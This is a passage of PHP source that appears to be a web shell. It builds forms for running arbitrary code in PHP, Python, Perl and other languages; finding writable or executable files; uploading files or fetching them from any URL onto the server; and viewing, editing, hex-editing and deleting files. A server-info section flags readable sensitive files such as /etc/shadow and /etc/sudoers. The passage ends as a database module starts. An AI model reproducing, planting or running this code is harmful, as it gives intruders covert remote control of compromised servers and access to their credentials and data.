        }
        $s_lang_available = "<option value='php'>php</option>";
        $s_selected = "";
        $s_access = array("s_python", "s_perl", "s_ruby", "s_node", "s_nodejs", "s_gcc", "s_javac");
        foreach ($s_access as $s) {
            if (isset(${$s})) {
                $s_t = explode("_", $s);
                $s_checked = $s_lang == $s_t[1] ? "selected" : "";
                $s_lang_available .= "<option value='" . $s_t[1] . "' " . $s_checked . ">" . $s_t[1] . "</option>";
            }
        }
        $s_evaloptionclass = $s_lang == "php" ? "sembunyi" : "";
        $s_e_result = !empty($s_res) ? "<pre id='evalres' class='bt' style='margin:4px 0 0 0;padding:6px 0;' >" . hss($s_res) . "</pre>" : "";
        $s_result .= "<form action='" . $s_self . "' method='post'>\n                    <textarea id='evalcode' name='evalcode' style='height:150px;' class='txtarea'>" . hss($s_code) . "</textarea>\n                    <table><tr><td style='padding:0;'><p><input type='submit' name='evalcodesubmit' class='inputzbut' value='Go !' style='width:120px;height:30px;' /></p>\n                    </td><td><select name='lang' onchange='evalselect(this);' class='inputzbut' style='width:120px;height:30px;padding:4px;'>\n                    " . $s_lang_available . "\n                    </select>\n                    </td>\n                    <td><div title='If you want to give additional option to interpreter or compiler, give it here' id='additionaloption' class='" . $s_evaloptionclass . "'>Additional option&nbsp;&nbsp;<input class='inputz' style='width:400px;' type='text' name='evaloption' value='" . hss($s_evaloption) . "' id='evaloption' /></div></td>\n                    </tr>\n                    </table>\n                    " . $s_e_result . "\n                    <input type='hidden' name='x' value='eval' />\n                    </form>";
    } elseif (isset($_GP['find'])) {
        $s_p = $_GP['find'];
        $s_type = isset($_GP['type']) ? $_GP['type'] : "sfile";
        $s_sfname = !empty($_GP['sfname']) ? $_GP['sfname'] : '';
        $s_sdname = !empty($_GP['sdname']) ? $_GP['sdname'] : '';
        $s_sfcontain = !empty($_GP['sfcontain']) ? $_GP['sfcontain'] : '';
        $s_sfnameregexchecked = $s_sfnameicasechecked = $s_sdnameregexchecked = $s_sdnameicasechecked = $s_sfcontainregexchecked = $s_sfcontainicasechecked = $s_swritablechecked = $s_sreadablechecked = $s_sexecutablechecked = "";
        $s_sfnameregex = $s_sfnameicase = $s_sdnameregex = $s_sdnameicase = $s_sfcontainregex = $s_sfcontainicase = $s_swritable = $s_sreadable = $s_sexecutable = false;
        if (isset($_GP['sfnameregex'])) {
            $s_sfnameregex = true;
            $s_sfnameregexchecked = "checked";
        }
        if (isset($_GP['sfnameicase'])) {
            $s_sfnameicase = true;
            $s_sfnameicasechecked = "checked";
        }
        if (isset($_GP['sdnameregex'])) {
            $s_sdnameregex = true;
            $s_sdnameregexchecked = "checked";
        }
        if (isset($_GP['sdnameicase'])) {
            $s_sdnameicase = true;
            $s_sdnameicasechecked = "checked";
        }
        if (isset($_GP['sfcontainregex'])) {
            $s_sfcontainregex = true;
            $s_sfcontainregexchecked = "checked";
        }
        if (isset($_GP['sfcontainicase'])) {
            $s_sfcontainicase = true;
            $s_sfcontainicasechecked = "checked";
        }
        if (isset($_GP['swritable'])) {
            $s_swritable = true;
            $s_swritablechecked = "checked";
        }
        if (isset($_GP['sreadable'])) {
            $s_sreadable = true;
            $s_sreadablechecked = "checked";
        }
        if (isset($_GP['sexecutable'])) {
            $s_sexecutable = true;
            $s_sexecutablechecked = "checked";
        }
        $s_sexecb = function_exists("is_executable") ? "<input class='css-checkbox' type='checkbox' name='sexecutable' value='sexecutable' id='se' " . $s_sexecutablechecked . " /><label class='css-label' for='se'>Executable</span>" : "";
        $s_candidate = array();
        if (isset($_GP['sgo'])) {
            $s_af = "";
            $s_candidate = getallfiles($s_p);
            if ($s_type == 'sfile') {
                $s_candidate = @array_filter($s_candidate, "is_file");
            } elseif ($s_type == 'sdir') {
                $s_candidate = @array_filter($s_candidate, "is_dir");
            }
            foreach ($s_candidate as $s_a) {
                if ($s_type == 'sdir') {
                    if (!empty($s_sdname)) {
                        if ($s_sdnameregex) {
                            if ($s_sdnameicase) {
                                if (!preg_match("/" . $s_sdname . "/i", basename($s_a))) {
                                    $s_candidate = array_diff($s_candidate, array($s_a));
                                }
                            } else {
                                if (!preg_match("/" . $s_sdname . "/", basename($s_a))) {
                                    $s_candidate = array_diff($s_candidate, array($s_a));
                                }
                            }
                        } else {
                            if ($s_sdnameicase) {
                                if (strpos(strtolower(basename($s_a)), strtolower($s_sdname)) === false) {
                                    $s_candidate = array_diff($s_candidate, array($s_a));
                                }
                            } else {
                                if (strpos(basename($s_a), $s_sdname) === false) {
                                    $s_candidate = array_diff($s_candidate, array($s_a));
                                }
                            }
                        }
                    }
                } elseif ($s_type == 'sfile') {
                    if (!empty($s_sfname)) {
                        if ($s_sfnameregex) {
                            if ($s_sfnameicase) {
                                if (!preg_match("/" . $s_sfname . "/i", basename($s_a))) {
                                    $s_candidate = array_diff($s_candidate, array($s_a));
                                }
                            } else {
                                if (!preg_match("/" . $s_sfname . "/", basename($s_a))) {
                                    $s_candidate = array_diff($s_candidate, array($s_a));
                                }
                            }
                        } else {
                            if ($s_sfnameicase) {
                                if (strpos(strtolower(basename($s_a)), strtolower($s_sfname)) === false) {
                                    $s_candidate = array_diff($s_candidate, array($s_a));
                                }
                            } else {
                                if (strpos(basename($s_a), $s_sfname) === false) {
                                    $s_candidate = array_diff($s_candidate, array($s_a));
                                }
                            }
                        }
                    }
                    if (!empty($s_sfcontain)) {
                        $s_sffcontent = @fgc($s_a);
                        if ($s_sfcontainregex) {
                            if ($s_sfcontainicase) {
                                if (!preg_match("/" . $s_sfcontain . "/i", $s_sffcontent)) {
                                    $s_candidate = array_diff($s_candidate, array($s_a));
                                }
                            } else {
                                if (!preg_match("/" . $s_sfcontain . "/", $s_sffcontent)) {
                                    $s_candidate = array_diff($s_candidate, array($s_a));
                                }
                            }
                        } else {
                            if ($s_sfcontainicase) {
                                if (strpos(strtolower($s_sffcontent), strtolower($s_sfcontain)) === false) {
                                    $s_candidate = array_diff($s_candidate, array($s_a));
                                }
                            } else {
                                if (strpos($s_sffcontent, $s_sfcontain) === false) {
                                    $s_candidate = array_diff($s_candidate, array($s_a));
                                }
                            }
                        }
                    }
                }
            }
        }
        $s_f_result = "";
        $s_link = "";
        foreach ($s_candidate as $s_c) {
            $s_c = trim($s_c);
            if ($s_swritable && !@is_writable($s_c)) {
                continue;
            }
            if ($s_sreadable && !@is_readable($s_c)) {
                continue;
            }
            if ($s_sexecutable && !@is_executable($s_c)) {
                continue;
            }
            if ($s_type == "sfile") {
                $s_link = $s_self . "view=" . pl($s_c);
            } elseif ($s_type == "sdir") {
                $s_link = $s_self . "view=" . pl(cp($s_c));
            }
            $s_f_result .= "<p class='notif' ondblclick=\"return go('" . adds($s_link) . "',event);\"><a href='" . $s_link . "'>" . $s_c . "</a></p>";
        }
        $s_tsdir = $s_type == "sdir" ? "selected" : "";
        $s_tsfile = $s_type == "sfile" ? "selected" : "";
        if (!@is_dir($s_p)) {
            $s_result .= notif("Cannot find the path specified " . $s_p);
        }
        $s_result .= "<form action='" . $s_self . "' method='post'>\n        <div class='mybox'><h2>Find</h2>\n        <table class='myboxtbl'>\n        <tr><td style='width:140px;'>Search in</td>\n        <td colspan='2'><input style='width:100%;' value='" . hss($s_p) . "' class='inputz' type='text' name='find' /></td></tr>\n        <tr onclick=\"findtype('sdir');\">\n            <td>Dirname contains</td>\n            <td style='width:400px;'><input class='inputz' style='width:100%;' type='text' name='sdname' value='" . hss($s_sdname) . "' /></td>\n            <td>\n                <input type='checkbox' class='css-checkbox' name='sdnameregex' id='sdn' " . $s_sdnameregexchecked . " /><label class='css-label' for='sdn'>Regex (pcre)</label>\n                <input type='checkbox' class='css-checkbox' name='sdnameicase' id='sdi' " . $s_sdnameicasechecked . " /><label class='css-label' for='sdi'>Case Insensitive</label>\n            </td>\n        </tr>\n        <tr onclick=\"findtype('sfile');\">\n            <td>Filename contains</td>\n            <td style='width:400px;'><input class='inputz' style='width:100%;' type='text' name='sfname' value='" . hss($s_sfname) . "' /></td>\n            <td>\n                <input type='checkbox' class='css-checkbox' name='sfnameregex'  id='sfn' " . $s_sfnameregexchecked . " /><label class='css-label' for='sfn'>Regex (pcre)</label>\n                <input type='checkbox' class='css-checkbox' name='sfnameicase'  id='sfi' " . $s_sfnameicasechecked . " /><label class='css-label' for='sfi'>Case Insensitive</label>\n            </td>\n        </tr>\n        <tr onclick=\"findtype('sfile');\">\n            <td>File contains</td>\n            <td style='width:400px;'><input class='inputz' style='width:100%;' type='text' name='sfcontain' value='" . hss($s_sfcontain) . "' /></td>\n            <td>\n                <input type='checkbox' class='css-checkbox' name='sfcontainregex' id='sff' " . $s_sfcontainregexchecked . " /><label class='css-label' for='sff'>Regex (pcre)</label>\n                <input type='checkbox' class='css-checkbox' name='sfcontainicase' id='sffi' " . $s_sfcontainicasechecked . " /><label class='css-label' for='sffi'>Case Insensitive</label>\n            </td>\n        </tr>\n        <tr>\n            <td>Permissions</td>\n            <td colspan='2'>\n                <input type='checkbox' class='css-checkbox' name='swritable' id='sw' " . $s_swritablechecked . " /><label class='css-label' for='sw'>Writable</label>\n                <input type='checkbox' class='css-checkbox' name='sreadable' id='sr' " . $s_sreadablechecked . " /><label class='css-label' for='sr'>Readable</label>\n                " . $s_sexecb . "\n            </td>\n        </tr>\n        <tr><td>\n        <input type='submit' name='sgo' class='inputzbut' value='Search !' style='width:120px;height:30px;margin:0;' />\n        </td>\n        <td>\n        <select name='type' id='type' class='inputzbut' style='width:120px;height:30px;margin:0;padding:4px;'>\n            <option value='sfile' " . $s_tsfile . ">Search file</option>\n            <option value='sdir' " . $s_tsdir . ">Search dir</option>\n        </select>\n        </td>\n        <td></td></tr>\n        </table>\n        </div>\n        </form>\n        <div>\n        " . $s_f_result . "\n        </div>";
    } elseif (isset($_GP['x']) && $_GP['x'] == 'upload') {
        $s_result = " ";
        $s_msg = "";
        if (isset($_GP['uploadhd'])) {
            $c = count($_FILES['filepath']['name']);
            for ($i = 0; $i < $c; $i++) {
                $s_fn = $_FILES['filepath']['name'][$i];
                if (empty($s_fn)) {
                    continue;
                }
                if (is_uploaded_file($_FILES['filepath']['tmp_name'][$i])) {
                    $s_p = cp($_GP['savefolder'][$i]);
                    if (!@is_dir($s_p)) {
                        mkdir($s_p);
                    }
                    if (isset($_GP['savefilename'][$i]) && trim($_GP['savefilename'][$i]) != "") {
                        $s_fn = $_GP['savefilename'][$i];
                    }
                    $s_tm = $_FILES['filepath']['tmp_name'][$i];
                    $s_pi = cp($s_p) . $s_fn;
                    $s_st = @move_uploaded_file($s_tm, $s_pi);
                    if ($s_st) {
                        $s_msg .= notif("File uploaded to <a href='" . $s_self . "view=" . pl($s_pi) . "'>" . $s_pi . "</a>");
                    } else {
                        $s_msg .= notif("Failed to upload " . $s_fn);
                    }
                } else {
                    $s_msg .= notif("Failed to upload " . $s_fn);
                }
            }
        } elseif (isset($_GP['uploadurl'])) {
            // function dlfile($s_url,$s_fpath)
            $c = count($_GP['fileurl']);
            for ($i = 0; $i < $c; $i++) {
                $s_fu = $_GP['fileurl'][$i];
                if (empty($s_fu)) {
                    continue;
                }
                $s_p = cp($_GP['savefolderurl'][$i]);
                if (!@is_dir($s_p)) {
                    mkdir($s_p);
                }
                $s_fn = basename($s_fu);
                if (isset($_GP['savefilenameurl'][$i]) && trim($_GP['savefilenameurl'][$i]) != "") {
                    $s_fn = $_GP['savefilenameurl'][$i];
                }
                $s_fp = cp($s_p) . $s_fn;
                $s_st = dlfile($s_fu, $s_fp);
                if ($s_st) {
                    $s_msg .= notif("File uploaded to <a href='" . $s_self . "view=" . pl($s_fp) . "'>" . $s_fp . "</a>");
                } else {
                    $s_msg .= notif("Failed to upload " . $s_fn);
                }
            }
        } else {
            if (!@is_writable($s_cwd)) {
                $s_msg = notif("Directory " . $s_cwd . " is not writable, please change to a writable one");
            }
        }
        if (!empty($s_msg)) {
            $s_result .= $s_msg;
        }
        $s_result .= "\n            <form action='" . $s_self . "' method='post' enctype='multipart/form-data'>\n            <div class='mybox'><h2><div class='but' onclick='adduploadc();'>+</div>Upload from computer</h2>\n            <table class='myboxtbl'>\n            <tbody id='adduploadc'>\n            <tr><td style='width:140px;'>File</td><td><input type='file' name='filepath[]' class='inputzbut' style='width:400px;margin:0;' /></td></tr>\n            <tr><td>Save to</td><td><input style='width:100%;' class='inputz' type='text' name='savefolder[]' value='" . hss($s_cwd) . "' /></td></tr>\n            <tr><td>Filename (optional)</td><td><input style='width:100%;' class='inputz' type='text' name='savefilename[]' value='' /></td></tr>\n            </tbody>\n            <tfoot>\n            <tr><td>&nbsp;</td><td>\n            <input type='submit' name='uploadhd' class='inputzbut' value='Upload !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />\n            <input type='hidden' name='x' value='upload' />\n            </td></tr>\n            </tfoot>\n            </table>\n            </div>\n            </form>\n            <form action='" . $s_self . "' method='post'>\n            <div class='mybox'><h2><div class='but' onclick='adduploadi();'>+</div>Upload from internet</h2>\n            <table class='myboxtbl'>\n            <tbody id='adduploadi'>\n            <tr><td style='width:150px;'>File URL</td><td><input style='width:100%;' class='inputz' type='text' name='fileurl[]' value='' />\n            </td></tr>\n            <tr><td>Save to</td><td><input style='width:100%;' class='inputz' type='text' name='savefolderurl[]' value='" . hss($s_cwd) . "' /></td></tr>\n            <tr><td>Filename (optional)</td><td><input style='width:100%;' class='inputz' type='text' name='savefilenameurl[]' value='' /></td></tr>\n            </tbody>\n            <tfoot>\n            <tr><td>&nbsp;</td><td>\n            <input type='submit' name='uploadurl' class='inputzbut' value='Upload !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />\n            <input type='hidden' name='x' value='upload' />\n            </td></tr>\n            </table>\n            </div>\n            </form>";
    } elseif (isset($_GP['view'])) {
        $s_f = $_GP['view'];
        if (isset($s_fnew) && trim($s_fnew) != "") {
            $s_f = $s_fnew;
        }
        $s_owner = "";
        if (@is_file($s_f)) {
            $targetdir = dirname($s_f);
            chdir($targetdir);
            $s_cwd = cp(getcwd());
            setcookie("cwd", $s_cwd, time() + $s_login_time);
            if (!$s_win && $s_posix) {
                $s_name = posix_getpwuid(fileowner($s_f));
                $s_group = posix_getgrgid(filegroup($s_f));
                $s_owner = "<tr><td>Owner</td><td>" . $s_name['name'] . "<span class='gaya'>:</span>" . $s_group['name'] . "</td></tr>";
            }
            $s_filn = basename($s_f);
            $s_result .= "<table class='viewfile' style='width:100%;'>\n            <tr><td style='width:140px;'>Filename</td><td><span id='" . cs($s_filn) . "_link'>" . $s_f . "</span>\n            <div id='" . cs($s_filn) . "_form' class='sembunyi'>\n            <form action='" . $s_self . "' method='post'>\n                <input type='hidden' name='oldname' value='" . hss($s_f) . "' style='margin:0;padding:0;' />\n                <input type='hidden' name='view' value='" . hss($s_f) . "' />\n                <input class='inputz' style='width:200px;' type='text' name='rename' value='" . hss($s_f) . "' />\n                <input class='inputzbut' type='submit' value='rename' />\n            </form>\n            <input class='inputzbut' type='button' value='x' onclick=\"tukar_('" . cs($s_filn) . "_form','" . cs($s_filn) . "_link');\" />\n            </div>\n            </td></tr>\n            <tr><td>Size</td><td>" . gs($s_f) . " (" . @filesize($s_f) . ")</td></tr>\n            <tr><td>Permission</td><td>" . gp($s_f) . "</td></tr>\n            " . $s_owner . "\n            <tr><td>Create time</td><td>" . @date("d-M-Y H:i:s", filectime($s_f)) . "</td></tr>\n            <tr><td>Last modified</td><td>" . @date("d-M-Y H:i:s", filemtime($s_f)) . "</td></tr>\n            <tr><td>Last accessed</td><td>" . @date("d-M-Y H:i:s", fileatime($s_f)) . "</td></tr>\n            <tr><td>Actions</td><td>\n            <a href='" . $s_self . "edit=" . pl($s_f) . "' title='edit'>edit</a> | <a href='" . $s_self . "hexedit=" . pl($s_f) . "' title='edit as hex'>hex</a> | <a href=\"javascript:tukar_('" . cs($s_filn) . "_link','" . cs($s_filn) . "_form');\" title='rename'>ren</a> | <a href='" . $s_self . "del=" . pl($s_f) . "' title='delete'>del</a> | <a href='" . $s_self . "dl=" . pl($s_f) . "'>dl</a>\n            </td></tr>\n            <tr><td>View</td><td>\n            <a href='" . $s_self . "view=" . pl($s_f) . "&type=text" . "'>text</a> | <a href='" . $s_self . "view=" . pl($s_f) . "&type=code" . "'>code</a> | <a href='" . $s_self . "view=" . pl($s_f) . "&type=image" . "'>image</a> | <a href='" . $s_self . "view=" . pl($s_f) . "&type=audio" . "'>audio</a> | <a href='" . $s_self . "view=" . pl($s_f) . "&type=video" . "'>video</a>\n            </td></tr>\n            </table>";
            $s_t = "";
            $s_mime = "";
            $s_mime_list = gzinflate(base64_decode($s_mime_types));
            $s_ext_pos = strrpos($s_f, ".");
            if ($s_ext_pos !== false) {
                $s_ext = trim(substr($s_f, $s_ext_pos), ".");
                if (preg_match("/([^\\s]+)\\ .*\\b" . $s_ext . "\\b.*/i", $s_mime_list, $s_r)) {
                    $s_mime = $s_r[1];
                }
            }
            $s_iinfo = @getimagesize($s_f);
            if (strtolower(substr($s_filn, -3, 3)) == "php") {
                $s_t = "code";
            } elseif (is_array($s_iinfo)) {
                $s_t = 'image';
            } elseif (!empty($s_mime)) {
                $s_t = substr($s_mime, 0, strpos($s_mime, "/"));
            }
            if (isset($_GP['type'])) {
                $s_t = $_GP['type'];
            }
            if ($s_t == "image") {
                $s_width = (int) $s_iinfo[0];
                $s_height = (int) $s_iinfo[1];
                $s_imginfo = "Image type = ( " . $s_iinfo['mime'] . " )<br />\n                    Image Size = <span class='gaul'>( </span>" . $s_width . " x " . $s_height . "<span class='gaul'> )</span><br />";
                if ($s_width > 800) {
                    $s_width = 800;
                    $s_imglink = "<p><a href='" . $s_self . "img=" . pl($s_filn) . "'>\n                    <span class='gaul'>[ </span>view full size<span class='gaul'> ]</span></a></p>";
                } else {
                    $s_imglink = "";
                }
                $s_result .= "<div class='viewfilecontent' style='text-align:center;'>" . $s_imglink . "\n                    <img width='" . $s_width . "' src='" . $s_self . "img=" . pl($s_filn) . "' alt='" . $s_filn . "' style='margin:8px auto;padding:0;border:0;' /></div>";
            } elseif ($s_t == "code") {
                $s_result .= "<div class=\"viewfilecontent\">";
                $s_file = wordwrap(@fgc($s_f), 160, "\n", true);
                $s_buff = highlight_string($s_file, true);
                $s_old = array("0000BB", "000000", "FF8000", "DD0000", "007700");
                $s_new = $s_theme == "bright" ? $s_highlight_bright : $s_highlight_dark;
                $s_buff = str_replace($s_old, $s_new, $s_buff);
                $s_result .= $s_buff;
                $s_result .= "</div>";
            } elseif ($s_t == "audio" || $s_t == "video") {
                $s_result .= "<div class='viewfilecontent' style='text-align:center;'>\n                            <" . $s_t . " controls>\n                            <source src='" . hss($s_self . "dltype=raw&dlpath=" . $s_f) . "' type='" . $s_mime . "'>\n                                <object data='" . hss($s_self . "dltype=raw&dlpath=" . $s_f) . "'>\n                                    <embed src='" . hss($s_self . "dltype=raw&dlpath=" . $s_f) . "'>\n                                </object>\n                            </" . $s_t . ">\n                            </div>";
            } else {
                $s_result .= "<pre style='padding: 3px 8px 0 8px;' class='viewfilecontent'>";
                $s_result .= str_replace("<", "&lt;", str_replace(">", "&gt;", wordwrap(@fgc($s_f), 160, "\n", true)));
                $s_result .= "</pre>";
            }
        } elseif (@is_dir($s_f)) {
            chdir($s_f);
            $s_cwd = cp(getcwd());
            setcookie("cwd", $s_cwd, time() + $s_login_time);
            $s_result .= showdir($s_cwd);
        } else {
            $s_result .= notif("Cannot find the path specified " . $s_f);
        }
    } elseif (isset($_GP['edit'])) {
        $s_f = $_GP['edit'];
        $s_fc = "";
        $s_fcs = "";
        if (isset($_GP['new']) && $_GP['new'] == 'yes') {
            $s_num = 1;
            if (@is_file($s_f)) {
                $s_pos = strrpos($s_f, "_");
                if ($s_pos !== false) {
                    $s_num = (int) substr($s_f, $s_pos + 1);
                }
                while (@is_file(substr($s_f, 0, $s_pos) . "_" . $s_num)) {
                    $s_num++;
                }
                $s_f = substr($s_f, 0, $s_pos) . "_" . $s_num;
            }
        } else {
            if (@is_file($s_f)) {
                $s_fc = @fgc($s_f);
            }
        }
        if (isset($_GP['fc'])) {
            $s_fc = $_GP['fc'];
            $s_eol = $_GP['eol'];
            $s_eolf = pack("H*", geol($s_fc));
            $s_eolh = pack("H*", $s_eol);
            $s_fc = str_replace($s_eolf, $s_eolh, $s_fc);
            if ($s_filez = fopen($s_f, "w")) {
                $s_time = @date("d-M-Y H:i:s", time());
                if (fwrite($s_filez, $s_fc) !== false) {
                    $s_fcs = "File saved @ " . $s_time;
                } else {
                    $s_fcs = "Failed to save";
                }
                fclose($s_filez);
            } else {
                $s_fcs = "Permission denied";
            }
        } elseif (@is_file($s_f) && !@is_writable($s_f)) {
            $s_fcs = "This file is not writable";
        }
        $s_eol = geol($s_fc);
        if (!empty($s_fcs)) {
            $s_result .= notif($s_fcs);
        }
        $s_result .= "<form action='" . $s_self . "' method='post'>\n                <textarea id='fc' name='fc' class='txtarea'>" . hss($s_fc) . "</textarea>\n                <p style='text-align:center;'><input type='text' class='inputz' style='width:99%;' name='edit' value='" . hss($s_f) . "' /></p>\n                <p><input type='submit' class='inputzbut' value='Save !' style='width:120px;height:30px;' /></p>\n                <input type='hidden' name='eol' value='" . $s_eol . "' />\n                </form>";
    } elseif (isset($_GP['hexedit'])) {
        $s_f = $_GP['hexedit'];
        $s_fc = "";
        $s_fcs = "";
        $s_hexes = "";
        $s_lnum = 0;
        if (!empty($_GP['hx']) || !empty($_GP['hxt'])) {
            if (!empty($_GP['hx'])) {
                foreach ($_GP['hx'] as $s_hex) {
                    $s_hexes .= str_replace(" ", "", $s_hex);
                }
            } elseif (!empty($_GP['hxt'])) {
                $s_hexes = trim($_GP['hxt']);
            }
            if ($s_filez = fopen($s_f, "w")) {
                $s_bins = pack("H*", $s_hexes);
                $s_time = @date("d-M-Y H:i:s", time());
                if (fwrite($s_filez, $s_bins) !== false) {
                    $s_fcs = "File saved @ " . $s_time;
                } else {
                    $s_fcs = "Failed to save";
                }
                fclose($s_filez);
            } else {
                $s_fcs = "Permission denied";
            }
        } else {
            if (@is_file($s_f) && !@is_writable($s_f)) {
                $s_fcs = "This file is not writable";
            }
        }
        if (!empty($s_fcs)) {
            $s_result .= notif($s_fcs);
        }
        $s_result .= "<form action='" . $s_self . "' method='post'><p class='ce mp'><input type='text' class='inputz' style='width:100%;' name='hexedit' value='" . hss($s_f) . "' /></p><p class='bb' style='padding:0 0 14px 0;'><input type='submit' class='inputzbut' value='Save !' style='width:120px;height:30px;' onclick=\"return sh();\" /></p><table class='explore'>";
        if (@is_file($s_f)) {
            $s_fp = fopen($s_f, "r");
            if ($s_fp) {
                $s_ldump = "";
                $s_counter = 0;
                $s_icounter = 0;
                while (!feof($s_fp)) {
                    $s_line = fread($s_fp, 32);
                    $s_linehex = strtoupper(bin2hex($s_line));
                    $s_linex = str_split($s_linehex, 2);
                    $s_linehex = implode(" ", $s_linex);
                    $s_addr = sprintf("%08xh", $s_icounter);
                    $s_result .= "<tr><td class='ce w60'>" . $s_addr . "</td><td class='le w594'><input onselect='this.selectionEnd=this.selectionStart;' onclick=\"hu('" . $s_counter . "',event);\" onkeydown=\"return hf('" . $s_counter . "',event);\" onkeyup=\"hu('" . $s_counter . "',event);\" type='text' class='inputz w578' id='hex_" . $s_counter . "' name='hx[]' value='" . $s_linehex . "'  maxlength='" . strlen($s_linehex) . "' /></td><td class='le ls2'><pre name='hexdump' id='dump_" . $s_counter . "' class='mp'></pre></td></tr>";
                    $s_counter++;
                    $s_icounter += 32;
                }
                $s_result .= "<input type='hidden' id='counter' value='" . $s_counter . "' />";
                $s_result .= "<textarea name='hxt' id='hxt' class='sembunyi'></textarea>";
                fclose($s_fp);
            }
        }
        $s_result .= "</table></form>";
    } elseif (isset($_GP['x']) && $_GP['x'] == 'info') {
        $s_result = "";
        // server misc info
        $s_result = "<p class='notif' onclick=\"toggle('info_server')\">Server Info</p>";
        $s_result = "<p class='notif' onclick=\"toggle('info_server')\">Server Info</p><div class='info' id='info_server'><table>";
        if ($s_win) {
            foreach (range("A", "Z") as $s_letter) {
                if (@is_dir($s_letter . ":\\") && @is_readable($s_letter . ":\\")) {
                    $s_drive = $s_letter . ":";
                    $s_result .= "<tr><td>drive " . $s_drive . "</td><td>" . ts(disk_free_space($s_drive)) . " free of " . ts(disk_total_space($s_drive)) . "</td></tr>";
                }
            }
        } else {
            $s_result .= "<tr><td>root partition</td><td>" . ts(@disk_free_space("/")) . " free of " . ts(@disk_total_space("/")) . "</td></tr>";
        }
        $s_result .= "<tr><td>php</td><td>" . phpversion() . "</td></tr>";
        $s_access = array("s_python", "s_perl", "s_ruby", "s_node", "s_nodejs", "s_gcc", "s_java", "s_javac", "s_tar", "s_wget", "s_lwpdownload", "s_lynx", "s_curl");
        foreach ($s_access as $s) {
            $s_t = explode("_", $s);
            if (isset(${$s})) {
                $s_result .= "<tr><td>" . $s_t[1] . "</td><td>" . ${$s} . "</td></tr>";
            }
        }
        if (!$s_win) {
            $s_interesting = array("/etc/os-release", "/etc/passwd", "/etc/shadow", "/etc/group", "/etc/issue", "/etc/issue.net", "/etc/motd", "/etc/sudoers", "/etc/hosts", "/etc/aliases", "/proc/version", "/etc/resolv.conf", "/etc/sysctl.conf", "/etc/named.conf", "/etc/network/interfaces", "/etc/squid/squid.conf", "/usr/local/squid/etc/squid.conf", "/etc/ssh/sshd_config", "/etc/httpd/conf/httpd.conf", "/usr/local/apache2/conf/httpd.conf", " /etc/apache2/apache2.conf", "/etc/apache2/httpd.conf", "/usr/pkg/etc/httpd/httpd.conf", "/usr/local/etc/apache22/httpd.conf", "/usr/local/etc/apache2/httpd.conf", "/var/www/conf/httpd.conf", "/etc/apache2/httpd2.conf", "/etc/httpd/httpd.conf", "/etc/lighttpd/lighttpd.conf", "/etc/nginx/nginx.conf", "/etc/fstab", "/etc/mtab", "/etc/crontab", "/etc/inittab", "/etc/modules.conf", "/etc/modules");
            foreach ($s_interesting as $s_f) {
                if (@is_file($s_f) && @is_readable($s_f)) {
                    $s_result .= "<tr><td>" . $s_f . "</td><td><a href='" . $s_self . "view=" . pl($s_f) . "'>" . $s_f . " is readable</a></td></tr>";
                }
            }
        }
        $s_result .= "</table></div>";
        if (!$s_win) {
            // cpu info
            if ($s_i_buff = trim(@fgc("/proc/cpuinfo"))) {
                $s_result .= "<p class='notif' onclick=\"toggle('info_cpu')\">CPU Info</p>";
                $s_result .= "<div class='info' id='info_cpu'>";
                $s_i_buffs = explode("\n\n", $s_i_buff);
                foreach ($s_i_buffs as $s_i_buffss) {
                    $s_i_buffss = trim($s_i_buffss);
                    if ($s_i_buffss != "") {
                        $s_i_buffsss = explode("\n", $s_i_buffss);
                        $s_result .= "<table>";
                        foreach ($s_i_buffsss as $s_i) {
                            $s_i = trim($s_i);
                            if ($s_i != "") {
                                $s_ii = explode(":", $s_i);
                                if (count($s_ii) == 2) {
                                    $s_result .= "<tr><td>" . $s_ii[0] . "</td><td>" . $s_ii[1] . "</td></tr>";
                                }
                            }
                        }
                        $s_result .= "</table>";
                    }
                }
                $s_result .= "</div>";
            }
            // mem info
            if ($s_i_buff = trim(@fgc("/proc/meminfo"))) {
                $s_result .= "<p class='notif' onclick=\"toggle('info_mem')\">Memory Info</p>";
                $s_i_buffs = explode("\n", $s_i_buff);
                $s_result .= "<div class='info' id='info_mem'><table>";
                foreach ($s_i_buffs as $s_i) {
                    $s_i = trim($s_i);
                    if ($s_i != "") {
                        $s_ii = explode(":", $s_i);
                        if (count($s_ii) == 2) {
                            $s_result .= "<tr><td>" . $s_ii[0] . "</td><td>" . $s_ii[1] . "</td></tr>";
                        }
                    } else {
                        $s_result .= "</table><table>";
                    }
                }
                $s_result .= "</table></div>";
            }
            // partition
            if ($s_i_buff = trim(@fgc("/proc/partitions"))) {
                $s_i_buff = preg_replace("/\\ +/", " ", $s_i_buff);
                $s_result .= "<p class='notif' onclick=\"toggle('info_part')\">Partitions Info</p>";
                $s_result .= "<div class='info' id='info_part'>";
                $s_i_buffs = explode("\n\n", $s_i_buff);
                $s_result .= "<table><tr>";
                $s_i_head = explode(" ", $s_i_buffs[0]);
                foreach ($s_i_head as $s_h) {
                    $s_result .= "<th>" . $s_h . "</th>";
                }
                $s_result .= "</tr>";
                $s_i_buffss = explode("\n", $s_i_buffs[1]);
                foreach ($s_i_buffss as $s_i_b) {
                    $s_i_row = explode(" ", trim($s_i_b));
                    $s_result .= "<tr>";
                    foreach ($s_i_row as $s_r) {
                        $s_result .= "<td style='text-align:center;'>" . $s_r . "</td>";
                    }
                    $s_result .= "</tr>";
                }
                $s_result .= "</table>";
                $s_result .= "</div>";
            }
        }
        $s_phpinfo = array("PHP General" => INFO_GENERAL, "PHP Configuration" => INFO_CONFIGURATION, "PHP Modules" => INFO_MODULES, "PHP Environment" => INFO_ENVIRONMENT, "PHP Variables" => INFO_VARIABLES);
        foreach ($s_phpinfo as $s_p => $s_i) {
            $s_result .= "<p class='notif' onclick=\"toggle('" . $s_i . "')\">" . $s_p . "</p>";
            ob_start();
            eval("phpinfo(" . $s_i . ");");
            $s_b = ob_get_contents();
            ob_end_clean();
            if (preg_match("/<body>(.*?)<\\/body>/is", $s_b, $r)) {
                $s_body = str_replace(array(",", ";", "&amp;"), array(", ", "; ", "&"), $r[1]);
                $s_result .= "<div class='info' id='" . $s_i . "'>" . $s_body . "</div>";
            }
        }
    } elseif (isset($_GP['x']) && $_GP['x'] == 'db') {
        // sqltype : mysql, mssql, oracle, pgsql, sqlite, sqlite3, odbc, pdo
        $s_sql = array();
        $s_sql_deleted = "";
        $s_show_form = $s_show_dbs = true;
        if (isset($_GP['dc'])) {
            $k = $_GP['dc'];
            setcookie("c[" . $k . "]", "", time() - $s_login_time);
            $s_sql_deleted = $k;
        }
        if (isset($_COOKIE['c']) && !isset($_GP['connect'])) {
